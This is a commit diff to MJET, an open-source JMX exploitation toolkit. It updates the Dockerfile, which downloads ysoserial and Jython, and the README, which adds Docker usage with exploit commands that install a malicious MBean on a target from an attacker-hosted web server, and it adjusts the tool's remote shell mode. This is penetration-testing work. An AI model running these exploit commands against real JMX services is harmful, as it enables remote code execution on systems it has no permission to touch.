Python 4

Dockerfile

@@ -1,9 +1,10 @@
-FROM ubuntu:latest
+FROM openjdk:8-alpine
 ENV TZ=Europe/Stockholm
 RUN ln -snf /usr/share/zoneinfo/$TZ /etc/localtime && echo $TZ > /etc/timezone
-RUN apt-get update && apt-get install -y jython wget git && rm -rf /var/lib/apt/lists/*
 COPY . /app
-RUN wget https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar -O /app/jars/ysoserial.jar
+RUN wget "http://search.maven.org/remotecontent?filepath=org/python/jython-standalone/2.7.0/jython-standalone-2.7.0.jar" -O app/jython-standalone-2.7.0.jar \
+	&& wget https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar -O /app/jars/ysoserial.jar
 EXPOSE 8000
 WORKDIR /app
-ENTRYPOINT ["jython", "mjet.py"]
+ENTRYPOINT ["java", "-jar", "jython-standalone-2.7.0.jar", "mjet.py"]
+CMD ["-h"]

README.md

@@ -4,10 +4,13 @@ MOGWAI LABS JMX Exploitation Toolkit
 
 MJET is a fork of [sjet](https://github.com/siberas/sjet/), which was developed by siberas but is no longer actively maintained. MJET is maintained by the MOGWAI LABS team which also provided most of the original sjet codebase.
 
-
 MJET allows an easy exploitation of insecure configured JMX services. Additional background
 information can be found [here](https://www.optiv.com/blog/exploiting-jmx-rmi) and [here](https://www.owasp.org/images/c/c1/JMX_-_Java_Management_Extensions_-_Hans-Martin_Muench.pdf).
 
+## !!! Important: This project is no longer maintained
+This repository is **no longer activly maintained**. We recommend using [qtcs beanshooter](https://github.com/qtc-de/beanshooter) instead. 
+
+
 ## Prerequisites
 
 * [Jython 2.7](https://www.jython.org/)
@@ -19,7 +22,7 @@ information can be found [here](https://www.optiv.com/blog/exploiting-jmx-rmi) a
 MJET implements a CLI interface (using [argparse](https://docs.python.org/3/library/argparse.html)):
 
 ```
-jython mjet.py targetHost targetPort password MODE (modeOptions)
+jython mjet.py targetHost targetPort MODE password (modeOptions)
 ```
 Where
 
@@ -97,7 +100,7 @@ h0ng10@rocksteady ~/w/mjet>
 
 Installation with JMX credentials (also needs a weak configuration of the server):
 ```
-h0ng10@rocksteady:~/mjet$ jython mjet.py 192.168.11.136 9991 super_secret install http://192.168.11.132:8000 8000 --jmxrole JMXUSER --jmxpassword JMXPASSWORD
+h0ng10@rocksteady:~/mjet$ jython mjet.py 192.168.11.136 9991 install super_secret http://192.168.11.132:8000 8000 --jmxrole JMXUSER --jmxpassword JMXPASSWORD
 mJET - MOGWAI LABS JMX Exploitation Toolkit
 =======================================
 [+] Starting webserver at port 8000
@@ -412,6 +415,23 @@ $
 
 Reference: https://www.optiv.com/blog/exploiting-jmx-rmi
 
+### Docker
+
+Build and run the docker image
+
+```bash
+# Build
+docker build -t mjet .
+# Run Help
+docker run mjet
+# Exploit example
+docker run mjet 10.165.188.23 2222 install super_secret http://10.165.188.1:8000 8000
+# Run Interactive into shell
+docker run --entrypoint /bin/sh -it mjet
+```
+
+By default the docker image exposes port 8000 for the HTTP server. If you need another port you need to remember to expose it!
+
 ## Contributing
 
 Feel free to contribute.
@@ -424,6 +444,8 @@ Feel free to contribute.
 * **Arnim Rupp** - *Authentication support*
 * **Sebastian Kindler** - *Deserialization support*
 * **Karsten Zeides** - *JMX Message Protocol support, localhost bypass* [zeides](https://github.com/zeides)
+* **g60ocR** - *Docker file* [g60ocR](https://github.com/g60ocR)
+* **Morn98** - *Shell and RMI selection* [Morn98](https://github.com/Morn98))
 
 See also the list of [contributors](https://github.com/mogwailabs/sjet/graphs/contributors) who participated in this project.
 

mjet.py

@@ -380,7 +380,7 @@ def startShell(password, bean_server):
         if cmd == 'exit_shell':
             in_command_loop = False
         else:
-            executeCommand(password, cmd, bean_server)
+            executeCommand(password, cmd, bean_server, args.shell)
 
 ### /SHELL MODE ###